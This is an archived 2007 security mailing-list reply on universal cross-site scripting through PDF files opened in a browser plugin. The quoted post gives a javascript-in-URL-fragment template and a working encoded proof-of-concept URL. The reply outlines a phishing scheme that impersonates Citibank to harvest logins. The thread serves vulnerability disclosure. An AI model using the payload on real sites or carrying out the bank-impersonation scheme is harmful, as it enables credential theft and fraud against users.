Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
Re: [Full-disclosure] [WEB SECURITY] Universal XSS with PDF files: highly dangerous

From: Jean-Jacques Halans (halansgmail.com)
Date: Wed Jan 03 2007 - 15:54:44 CST

And it makes a great phishing hole too.
Google for any banking pdf's
and attach your fake banking site to let the user login to read the article.

For example:
Send out an email pretending to come from Citibank, about a new
article on Wealth Management, with a link to the real article:
Notice the popup (in firefox) which says: "The page at
http://www.citibank.com says:"


On 1/3/07, pdp (architect) <pdp.gnucitizengooglemail.com> wrote:
> I will be very quick and just point to links where you can read about
> this issue.
> It seams that PDF documents can execute JavaScript code for no
> apparent reason by using the following template:
> http://path/to/pdf/file.pdf#whatever_name_you_want=javascript:your_code_here
> You must understand that the attacker doesn't need to have write
> access to the specified PDF document. In order to get an XSS vector
> working you need to have a PDF file hosted on the target and that's
> all about it. The rest is just a matter of your abilities and desires.
> This finding was originally mentioned by Sven Vetsch, on his blog.
> This is a very good and quite interesting. Good work.
> There is a POC I composed:
> http://www.google.com/librariancenter/downloads/Tips_Tricks_85x11.pdf#something=javascript:function%20createXMLHttpRequest(){%20%20%20try{%20return%20new%20ActiveXObject('Msxml2.XMLHTTP');%20}catch(e){}%20%20%20try{%20return%20new%20ActiveXObject('Microsoft.XMLHTTP');%20}catch(e){}%20%20%20try{%20return%20new%20XMLHttpRequest();%20}catch(e){}%20%20%20return%20null;}var%20xhr%20=%20createXMLHttpRequest();xhr.onreadystatechange%20=%20function(){%20%20%20%20if%20(xhr.readyState%20==%204)%20%20%20%20%20%20%20%20alert(xhr.responseText);};xhr.open('GET',%20'http://www.google.com',%20true);xhr.send(null);
> More on the matter can be found here:
> http://www.gnucitizen.org/blog/danger-danger-danger/
> http://www.disenchant.ch/blog/hacking-with-browser-plugins/34
> --
> pdp (architect) | petko d. petkov
> http://www.gnucitizen.org
> ----------------------------------------------------------------------------
> The Web Security Mailing List:
> http://www.webappsec.org/lists/websecurity/
> The Web Security Mailing List Archives:
> http://www.webappsec.org/lists/websecurity/archive/
> http://www.webappsec.org/rss/websecurity.rss [RSS Feed]

Halans Jean-Jacques

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/